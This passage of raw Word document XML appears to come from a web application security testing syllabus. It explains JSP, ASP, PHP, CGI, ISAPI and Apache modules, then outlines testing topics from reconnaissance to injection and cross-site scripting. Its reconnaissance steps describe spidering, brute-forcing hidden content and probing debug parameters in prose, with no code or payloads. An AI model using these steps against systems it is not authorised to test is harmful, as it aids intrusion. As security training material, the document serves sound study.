        <w:t>Common web programming languages: JSP, ASP, PHP</w:t>
      </w:r>
      <w:r>
        <w:t>, CGI based Perl and JavaScript</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JavaServer Pages (JSP) is a Java technology that helps software developers serve dynamically generated web pages based on HTML, XML, or other document types. Architecturally, JSP may be viewed as a high-level abstraction of Java servlets. JSP pages are loaded in the server and operated from a structured special installed Java server packet called a Java EE Web Application, often packaged as a .war or .ear file archive. JSP allows Java code and certain pre-defined actions to be interleaved with static web markup content, with the resulting page being compiled and executed on the server to deliver an HTML or XML document. The compiled pages and any dependent Java libraries use Java bytecode rather than a native software format, and must therefore be executed within a Java virtual machine (JVM) that integrates with the host operating system to provide an abstract platform-neutral environment.</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 xml:space="preserve">Active Server Pages (ASP), also known as Classic ASP or ASP Classic, was Microsoft's first server-side script engine for dynamically-generated web pages. It has now been superseded by ASP.NET. Developing functionality in ASP websites is enabled by the active scripting engine's support of the Component Object Model (COM), with each object providing a related group of frequently-used functions and data attributes. In ASP 2.0 there were six built-in objects: Application, ASPError, Request, Response, Server, and Session. Session, for example, is a cookie-based session object that maintains the state of variables from page to page. Web pages with the .asp file extension use ASP, although some Web sites disguise their choice of scripting language for security purposes Pages with the .aspx extension are ASP.NET (based on Microsoft's .NET Framework) and compiled, which makes them faster and more robust than server-side scripting in ASP which is interpreted at run-time. Most ASP pages are written in VBScript, but any other Active Scripting engine can be selected instead by using the @Language directive or the &lt;script language="language" runat="server"&gt; syntax. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A"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PHP: Hypertext Preprocessor is a widely used, general-purpose scripting language that was originally designed for web development to produce dynamic web pages. For this purpose, PHP code is embedded into the HTML source document and interpreted by a web server with a PHP processor module, which generates the web page document. As a general-purpose programming language, PHP code is processed by an interpreter application in command-line mode performing desired operating system operations and producing program output on its standard output channel. I</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The Common Gateway Interface (CGI) is a standard that defines how web server software can delegate the generation of web pages to a console application. Such applications are known as CGI scripts; they can be written in any programming language, although scripting languages are often used. In simple words the CGI provides an interface between the web servers and the clients. They will identify the request from client and will invoke appropriate function to return the result to the requested clients. The most common scripting language used for CGI is perl.</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JavaScript is a prototype-based object-oriented scripting language used to enable programmatic access to computational objects within a host environment. Although also used in other applications, it is primarily used in the form of client-side JavaScript, implemented as part of a web browser, providing enhanced user interfaces and dynamic websites. JavaScript is a dialect of the ECMAScript standard and is characterized as a dynamic, weakly typed, prototype-based language with first-class functions. JavaScript was influenced by many languages and was designed to look like Java, but to be easier for non-programmers to work with.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>G8 - Web APIs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="007C392E" w:rsidRDefault="0038663A" w:rsidP="007C392E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">G8a - </w:t>
      </w:r>
      <w:r w:rsidRPr="0038663A">
        <w:t>Application interfaces: CGI, I</w:t>
      </w:r>
      <w:r>
        <w:t>SAPI filters and Apache modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="007C392E" w:rsidRDefault="007C392E" w:rsidP="005F25BF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C95FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The Common Gateway Interface (CGI) is a standard that defines how web server software can delegate the generation of web pages to a console application. Such applications are known as CGI scripts; they can be written in any programming language, although scripting languages are often used. In simple words the CGI provides an interface between the web servers and the clients. They will identify the request from client and will invoke appropriate function to return the result to the requested clients. The most common scripting language used for CGI is perl.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C392E" w:rsidRPr="007C392E" w:rsidRDefault="007C392E" w:rsidP="007C392E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C392E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The Internet Server Application Programming Interface (ISAPI) is an N-tier API of Internet Information Services (IIS), Microsoft's collection of Windows-based web server services. The most prominent application of IIS and ISAPI is Microsoft's web server.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C392E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C392E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ISAPI consists of two components: Extensions and </w:t>
      </w:r>
      <w:r w:rsidRPr="007C392E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Filters. These are the only two types of applications that can be developed using ISAPI. Both Filters and Extensions must be compiled into DLL files which are then registered with IIS to be run on the web server. ISAPI applications can be written using any language which allows the export of standard C functions, for instance C, C++, Delphi. ISAPI Extensions are true applications that run on IIS. They have access to all of the functionality provided by IIS. ISAPI extensions are implemented as DLLs that are loaded into a process that is controlled by IIS. Clients can access ISAPI extensions in the same way they access a static HTML page. Certain file extensions or a complete folder or site can be mapped to be handled by an ISAPI extension. ISAPI filters are used to modify or enhance the functionality provided by IIS. They always run on an IIS server and filter every request until they find one they need to process. Filters can be programmed to examine and modify both incoming and outgoing streams of data. Internally programmed and externally configured priorities determine in which order filters are called. Filters are implemented as DLL files and can be registered on an IIS server on a site level or a global level (i.e., they apply to all sites on an IIS server). Filters are initialised when the worker process is started and listens to all requests to the site on which it is installed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C392E" w:rsidRPr="007C392E" w:rsidRDefault="007C392E" w:rsidP="007C392E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C392E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Apache supports a variety of features, many implemented as compiled modules which extend the core functionality. These can range from server-side programming language support to authentication schemes. Some common language interfaces support Perl, Python, Tcl, and PHP. Popular authentication modules include mod_access, mod_auth, mod_digest, and mod_auth_digest, the successor to mod_digest. A sample of other features include SSL and TLS support (mod_ssl), a proxy module (mod_proxy), a URL rewriter (also known as a rewrite engine, implemented under mod_rewrite), custom log files (mod_log_config), and filtering support (mod_include and mod_ext_filter). Popular compression methods on Apache include the external extension module, mod_gzip, implemented to help with reduction of the size (weight) of web pages served over HTTP. ModSecurity is an open source intrusion detection and prevention engine for web applications. Apache logs can be analyzed through a web browser using free scripts such as AWStats/W3Perl or Visitors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000336A2" w:rsidRDefault="000336A2">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000336A2" w:rsidRDefault="000336A2" w:rsidP="000336A2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="000336A2">
        <w:lastRenderedPageBreak/>
        <w:t>Web Testing Methodologies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000336A2" w:rsidRDefault="000336A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0336A2" w:rsidRPr="005F25BF" w:rsidTr="000336A2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="572"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Application Reconnaissance</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Benefits of performing application reconnaissance.</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Discovering the structure of web applications.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000336A2"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Methods to identify the use of application</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> components defined in G1 to G9</w:t>
            </w:r>
            <w:r w:rsidRPr="000336A2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.</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H2</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Threat Modelling and Attack Vectors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Simple threat modelling based on customer perception of risk.</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Relate functionality offered by the application to potential attack vectors.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H3</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Gathering from Web Mark-up</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Examples of the type of information available in web page source that may prove useful to an attacker:</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Hidden Form Fields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Database Connection Strings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Credentials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Developer Comments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Other included files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Authenticated-only URLs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H4</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Authentication Mechanisms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632"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pitfalls associated with the design and implementation of application authentication mechanisms.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RPr="00434D06"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H5</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Authorisation Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000336A2"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pitfalls associated with the design and implementation of application authorisation mechanisms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="889" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000336A2" w:rsidRPr="00434D06" w:rsidRDefault="000336A2" w:rsidP="000336A2">
            <w:pPr>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H6</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Input Validation</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The importance of input validation as part of a defensive coding strategy.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000336A2"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How input validation can be implemented and the differences between white listing, black listing and data sanitisation.</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H8</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Information Disclosure in Error Messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000336A2" w:rsidRPr="00A42E2F"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How error messages may indicate or disclose useful information.</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H9</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Use of Cross Site Scripting Attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>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Potential implications of a cross site scripting vulnerability.</w:t>
            </w:r>
          </w:p>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Ways in which the technique can be used to benefit an attacker.</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H10</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Use of Injection Attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>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Potential implications of injection vulnerabilities:</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SQL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LDAP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Code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XML injection</w:t>
            </w:r>
          </w:p>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Ways in which these techniques can be used to benefit an attacker.</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H11</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Session Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000336A2" w:rsidRPr="000336A2" w:rsidRDefault="003D0604" w:rsidP="000336A2">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pitfalls associated with the design and implementation of session handling mechanisms.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H12</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Encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000336A2" w:rsidRPr="000336A2" w:rsidRDefault="003D0604" w:rsidP="003D0604">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techniques used for encrypting data in transit and data at rest, either on the client or server side.</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H13</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Source Code Review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000336A2" w:rsidRPr="000336A2" w:rsidRDefault="003D0604" w:rsidP="000336A2">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techniques for identifying and reviewing deficiencies in the areas of security.</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9750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>H1 - Web Application Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">H1a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Benefits of perfor</w:t>
      </w:r>
      <w:r>
        <w:t>ming application reconnaissance</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7C392E" w:rsidRDefault="009750CD" w:rsidP="007C392E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">H1b - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Discovering th</w:t>
      </w:r>
      <w:r>
        <w:t>e structure of web applications</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C392E" w:rsidRPr="007C392E" w:rsidRDefault="007C392E" w:rsidP="007C392E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C392E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Map the Application:</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Explore Displayed Content - This involves stepping through the application manually as well as using spidering and brute force automation to discover all the applications content.</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Consult Public Resources - This involves using various searching techniques to discover indexed and cached content using powerful search engines.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Discover Hidden Content - This involves determining how the app handles non-existant content then following a number of logic methods of informed guessing and brute forcing pages to find content not directly linked in the main site.</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Discover Default Content - This involves running a tool that will discover default or well known content such as default IIS or Apache pages, then determining any false positives and verifying all findings.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Enumerate Identifier-Specified Functions - This is similar to the hidden content step but is in regards to functions on pages and attempting to discover different parameters.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Test for Debug Parameters - This is similar to the previous step but in regards to debug parameters which are often within an application to help developers find the causes to errors in the app.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C392E" w:rsidRPr="007C392E" w:rsidRDefault="007C392E" w:rsidP="007C392E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C392E" w:rsidRPr="007C392E" w:rsidRDefault="007C392E" w:rsidP="007C392E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C392E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Analyse the Application:</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Identify functionality - This involves determining all the core functions the app is intended to do, all the core security mechanisms and all additional functions and behaviour.</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 xml:space="preserve">Identify Entry Points - This involves looking at all the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C392E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>area's</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C392E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> of user input, including the cookies and HTTP headers sent in each request and attempting to determine all the ways that the application accepts data.</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Identify Technologies - This involves reviewing returned content and noting the technologies used be it thin or thick client or server technologies. Using both tools and google searches to discover servers and add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="007C392E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ons. Use extensions and directory structures to determine this. Note: why isn't this automated and within current application scanners?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD"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Map the Attack Surface - This involves determining what the structure and functionality of different parts of the app are and what likely technologies deliver them. Try to identify the common vulnerabilities of these to tune your testing. Create an attack plan and prioritise the most interesting functions to allow best use of available time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">H1c - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Methods to identify the use of application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> components defined in G1 to G9</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H2 - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Thre</w:t>
      </w:r>
      <w:r>
        <w:t>at Modelling and Attack Vectors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">H2a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Simple threat modelling based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on customer perception of risk</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H2b - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Relate functionality offered by the applicat</w:t>
      </w:r>
      <w:r>
        <w:t>ion to potential attack vectors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lastRenderedPageBreak/>
        <w:t xml:space="preserve">H3 - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Informa</w:t>
      </w:r>
      <w:r>
        <w:t>tion Gathering from Web Mark-up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">H3a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Examples of the type of information available in web page source that may prove useful to an attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009750CD">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:tab/>
        <w:t>Hidden Form Fields</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009750CD">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:tab/>
        <w:t>Database Connection Strings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009750CD">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:tab/>
        <w:t>Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009750CD">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:tab/>
        <w:t>Developer Comments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009750CD">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:tab/>
        <w:t>Other included files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009750CD">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:tab/>
        <w:t>Authenticated-only URLs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H4 - Authentication Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">H4a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Common pitfalls associated with the design and implementation of applic</w:t>
      </w:r>
      <w:r>
        <w:t>ation authentication mechanisms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H5 - Authorisation Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">H5a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Common pitfalls associated with the design and implementation of application authorisation mecha</w:t>
      </w:r>
      <w:r>
        <w:t>nisms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H6 - Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">H6a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>The importance of input validation as part</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of a defensive coding strategy</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H6b - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>How input validation can be implemented and the differences between white listing, blac</w:t>
      </w:r>
      <w:r>
        <w:t>k listing and data sanitisation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H8 - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Information Disclosure in Error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Messages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">H8a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>How error messages may indicate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or disclose useful information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H9 - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:t>of Cross Site Scripting Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">H9a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Potential implications of a cro</w:t>
      </w:r>
      <w:r>
        <w:t>ss site scripting vulnerability</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H9b - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Ways in which the technique can</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be used to benefit an attacker</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">H10 - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Use of Inje</w:t>
      </w:r>
      <w:r>
        <w:t>ction Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">H10a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Potential implications of injection vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009750CD">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:tab/>
        <w:t>SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009750CD">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:tab/>
        <w:t>LDAP injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009750CD">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:tab/>
        <w:t>Code injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009750CD">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:tab/>
        <w:t>XML injection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H10b - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Ways in which these techniques can</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be used to benefit an attacker</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H11 - Session Handling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">H11a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Common pitfalls associated with the design and implementation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of session handling mechanisms</w:t>
      </w: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H12 – Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRDefault="000734AC" w:rsidP="000734AC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">H12a - </w:t>
      </w:r>
      <w:r w:rsidR="009750CD" w:rsidRPr="009750CD">
        <w:t>Common techniques used for encrypting data in transit and data at rest, eith</w:t>
      </w:r>
      <w:r w:rsidR="009750CD">
        <w:t>er on the client or server side</w:t>
      </w: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autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRDefault="009750CD" w:rsidP="000734AC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>H13 - Source Code Review</w:t>
      </w:r>
    </w:p>
